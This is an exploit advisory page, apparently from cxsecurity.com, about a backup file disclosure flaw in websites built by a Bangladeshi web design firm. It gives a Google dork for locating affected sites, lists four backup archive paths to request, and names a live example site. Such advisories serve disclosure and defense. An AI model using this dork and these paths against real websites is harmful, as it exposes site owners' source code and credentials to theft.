Designed By RONY IT CorporateSolutionBD Backup File Disclosure Vulnerability

2018.11.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Designed By RONY IT CorporateSolutionBD Backup File Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 03/11/2018 # Vendor Homepage / Owner Social Media Link : corporatesolutionbd.com ~ facebook.com/r01715646441 # Tested On : Windows and Linux # Category : WebApps # Google Dork : intext:''Desgined by RONY IT'' site:bd # Exploit Risk : Medium # CWE : CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ] + CWE-552 - [ Files or Directories Accessible to External Parties ] + CWE-538 - [ File and Directory Information Exposure ] + CWE-200 - [ Information Exposure ] ################################################################################################# # About Company : Corporate Solution is a one of the market foremost latest technology solutions provider Company in Bangladesh which provides Secure, Scalable, On-Demand Solutions and Modern Technical Solutions with the slogan of “Innovate, Incorporate and Distinguish” to aid its customers worldwide advancing their business performance. # Backup File Disclosure Exploit : /backup.zip /cms.zip /cms2.tar /cms3.tar ################################################################################################# # Example Vulnerable Site => baghs1515.edu.bd/backup.zip ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top